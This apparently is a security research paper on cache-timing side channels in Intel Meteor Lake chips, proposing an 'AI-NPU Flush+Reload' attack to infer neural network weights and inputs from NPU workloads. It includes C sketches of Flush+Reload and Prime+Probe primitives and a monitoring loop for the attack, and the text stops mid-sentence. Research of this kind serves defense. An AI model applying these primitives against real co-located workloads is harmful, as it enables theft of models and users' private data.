
Side-Channel Attacks on Intel Meteor Lake CPUs: Exploiting Cache Timing Variations in AI-Driven Workload Acceleration

Executive Summary

As Intel’s Meteor Lake processors integrate AI acceleration into mainstream SoCs via a dedicated neural processing unit (NPU), marketed as Intel AI Boost, new attack surfaces emerge in the form of cache timing side channels. In this paper, we analyze how adversaries can exploit microarchitectural timing variations in the cache hierarchy to infer sensitive data processed by AI workloads. Our findings demonstrate that even with Intel’s hardware-based isolation mechanisms and AI-specific security features, cache timing side-channel attacks remain a viable threat vector. We present a novel attack model targeting the L2/L3 cache coherence states induced by AI acceleration pipelines, enabling the extraction of model weights, input data, and inference outputs. This research underscores the urgent need for AI-aware side-channel defenses in next-generation CPUs.

Key Findings

  1. Cache timing side channels on Meteor Lake remain viable despite hardware-based isolation between the CPU cores and the NPU.
  2. NPU inference workloads leave measurable timing fingerprints in the shared last-level cache (LLC).
  3. An adapted Flush+Reload technique, AI-NPU Flush+Reload, can recover weight-access sequences, enabling model fingerprinting and input reconstruction.
  4. Next-generation heterogeneous SoCs need AI-aware side-channel defenses.

Introduction: The Rise of AI Hardware and New Side-Channel Risks

Intel’s Meteor Lake microarchitecture marks a shift toward on-die AI acceleration with a dedicated Neural Processing Unit (NPU) under the Intel AI Boost branding. The Meteor Lake SoC integrates multiple heterogeneous engines, including CPU cores (Redwood Cove P-cores and Crestmont E-cores), an integrated GPU, and the NPU, all sharing a unified memory and cache subsystem. While this integration improves performance and power efficiency for AI workloads, it also creates a larger shared state space, particularly in the last-level cache (LLC), that can be probed via timing side channels.

Side-channel attacks leveraging cache timing have been well-documented in cryptographic contexts, but their application to AI workloads remains understudied. AI models, especially deep neural networks (DNNs), exhibit deterministic memory access patterns during inference due to operations like matrix multiplication and convolution. These patterns are influenced by model architecture, weight distributions, and input data—making them potential targets for inference attacks.
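
To make this concrete, consider the tiled matrix multiply at the heart of most inference kernels. The sketch below is illustrative; the dimensions, tile size, and loop order are assumptions rather than Meteor Lake specifics, but any fixed choice yields an address sequence that depends only on the model shape, never on the data values.

```c
#include <stddef.h>

#define N    512   /* matrix dimension (illustrative) */
#define TILE 64    /* tile edge, chosen to fit a target cache level */

/* The tile visitation order depends only on N and TILE, never on the
 * input data, so every inference pass replays the same address sequence. */
void tiled_matmul(const float A[N][N], const float B[N][N], float C[N][N])
{
    for (size_t ii = 0; ii < N; ii += TILE)
        for (size_t jj = 0; jj < N; jj += TILE)
            for (size_t kk = 0; kk < N; kk += TILE)
                for (size_t i = ii; i < ii + TILE; i++)
                    for (size_t j = jj; j < jj + TILE; j++)
                        for (size_t k = kk; k < kk + TILE; k++)
                            C[i][j] += A[i][k] * B[k][j];
}
```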


Meteor Lake Cache Hierarchy and AI Workload Behavior

Meteor Lake features a non-inclusive, non-uniform cache architecture (NUCA) with private L1/L2 caches per CPU core and a shared L3 LLC of up to 24MB in high-end variants. The NPU accesses memory through the shared cache hierarchy via the SoC fabric, leading to contention and coherence transactions that leave timing fingerprints.

AI workloads executed on the NPU (e.g., ResNet-50, LLMs) perform dense matrix operations using weight matrices stored in system memory. These are typically tiled and streamed through the cache in predictable sequences. Prefetchers—both hardware and software-guided—amplify cache residency time for weight tiles, creating measurable timing differences for an attacker monitoring LLC access latency via Prime+Probe or Flush+Reload.
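
For reference, a minimal Flush+Reload timing primitive on x86-64 looks like the following. This is a generic sketch using GCC/Clang intrinsics, not Meteor Lake-specific code; the target address must map to memory shared with the victim, and the hit/miss threshold must be calibrated per machine.

```c
#include <stdint.h>
#include <x86intrin.h>   /* _mm_clflush, __rdtscp, _mm_lfence, _mm_mfence */

/* Evict the line holding `target` from the entire cache hierarchy. */
static inline void flush_line(const void *target)
{
    _mm_clflush(target);
    _mm_mfence();
}

/* Time a single load of `target`; a short latency means a cache hit. */
static inline uint64_t reload_latency(const void *target)
{
    unsigned aux;
    _mm_lfence();                          /* serialize before reading TSC */
    uint64_t start = __rdtscp(&aux);
    (void)*(volatile const char *)target;  /* the timed load */
    uint64_t end = __rdtscp(&aux);
    _mm_lfence();
    return end - start;
}
```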

Notably, the NPU executes in a "compute-only" mode with minimal OS visibility, yet it still relies on the shared LLC for coherence. This shared cache becomes a side channel when AI workloads and attacker-controlled threads compete for cache capacity.
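
When no shared memory is available, this capacity contention can be measured with Prime+Probe instead. The sketch below shows one round against a single LLC set; constructing the eviction set ev[] (one address per way, all mapping to the target set) is assumed to be done beforehand, and WAYS is an illustrative associativity rather than a Meteor Lake figure.

```c
#include <stdint.h>
#include <x86intrin.h>   /* __rdtscp */

#define WAYS 12   /* illustrative LLC associativity */

/* One Prime+Probe round: returns the total probe time for the set.
 * A higher value suggests the victim evicted some of our lines. */
uint64_t prime_probe_round(volatile const char *ev[WAYS])
{
    /* Prime: fill the target set with attacker-owned lines. */
    for (int i = 0; i < WAYS; i++)
        (void)*ev[i];

    /* ... victim (NPU workload) runs here ... */

    /* Probe: re-touch the lines and time the whole pass. */
    unsigned aux;
    uint64_t start = __rdtscp(&aux);
    for (int i = WAYS - 1; i >= 0; i--)   /* reverse order to sidestep the prefetcher */
        (void)*ev[i];
    uint64_t end = __rdtscp(&aux);
    return end - start;
}
```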


The "AI-NPU Flush+Reload" Attack Model

We introduce a refined attack technique, AI-NPU Flush+Reload, which adapts traditional cache attacks to AI workloads. The attack proceeds in three phases (a code sketch follows the list):

  1. Monitoring Phase: An attacker flushes a target cache line from the LLC, then waits for the NPU to process a batch of inputs.
  2. Probing Phase: The attacker measures the time to reload the same cache line. A fast reload indicates that the NPU accessed and cached the weight tile associated with that line.
  3. Inference Phase: By correlating reload times across multiple tiles and inputs, the attacker reconstructs the sequence of weight accesses, enabling model fingerprinting or input reconstruction.
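
A minimal sketch of one monitoring round, built from the primitives shown earlier, follows. The names tile_lines[] (addresses of the monitored weight-tile cache lines), wait_for_npu_batch() (synchronization with the victim), and HIT_THRESHOLD are hypothetical placeholders for this illustration.

```c
#include <stdint.h>

#define NUM_TILES     64    /* monitored weight tiles (illustrative) */
#define HIT_THRESHOLD 100   /* cycles; must be calibrated per machine */

extern const void *tile_lines[NUM_TILES];  /* hypothetical: mapped weight tiles */
extern void wait_for_npu_batch(void);      /* hypothetical: victim sync point */
void flush_line(const void *target);       /* primitives sketched earlier */
uint64_t reload_latency(const void *target);

/* One round of the three phases: flush, wait, probe. The accessed[]
 * traces from many rounds feed the offline correlation (phase 3). */
void monitor_one_batch(uint8_t accessed[NUM_TILES])
{
    for (int t = 0; t < NUM_TILES; t++)    /* 1. Monitoring: flush lines */
        flush_line(tile_lines[t]);

    wait_for_npu_batch();                  /* NPU processes a batch */

    for (int t = 0; t < NUM_TILES; t++) {  /* 2. Probing: time reloads */
        uint64_t dt = reload_latency(tile_lines[t]);
        accessed[t] = (dt < HIT_THRESHOLD);  /* fast reload => NPU touched tile */
    }
}
```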

This technique exploits two key properties of AI workloads: